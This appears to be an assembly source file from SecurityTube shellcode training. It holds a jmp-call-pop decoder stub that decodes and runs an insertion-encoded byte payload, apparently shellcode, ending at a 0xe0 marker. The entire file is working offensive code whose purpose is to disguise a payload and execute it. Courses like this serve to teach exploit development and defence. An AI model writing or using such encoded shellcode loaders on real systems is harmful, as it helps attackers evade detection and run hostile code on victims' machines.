; Filename: insertion-decoder.nasm
; Author:  Vivek Ramachandran
; Website:  http://securitytube.net
; Training: http://securitytube-training.com 
;
;
; Purpose: 

global _start			
section .text

_start:
	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx

decode: 
	mov bl, byte [esi + eax]
	xor bl, 0xe0 ; marker1
	jz short EncodedShellcode
	
	mov bl,byte [esi+eax+1]
	add bl, 0x7
	rol bl,8
	mov byte [edi],bl

	inc edi
	add al, 2
	jmp short decode	

call_shellcode:
	call decoder
	EncodedShellcode: db 0x2a,0x02,0xb9,0x09,0x49,0x07,0x61,0x01,0x28,0x06,0x28,0x03,0x6c,0x04,0x61,0x07,0x61,0x03,0x28,0x09,0x5b,0x03,0x62,0x06,0x67,0x08,0x82,0x09,0xdc,0x06,0x49,0x07,0x82,0x0a,0xdb,0x08,0x4c,0x01,0x82,0x07,0xda,0x04,0xa9,0x03,0x04,0x02,0xc6,0x08,0x79,0x08,0xe0,0xe0 ; marker2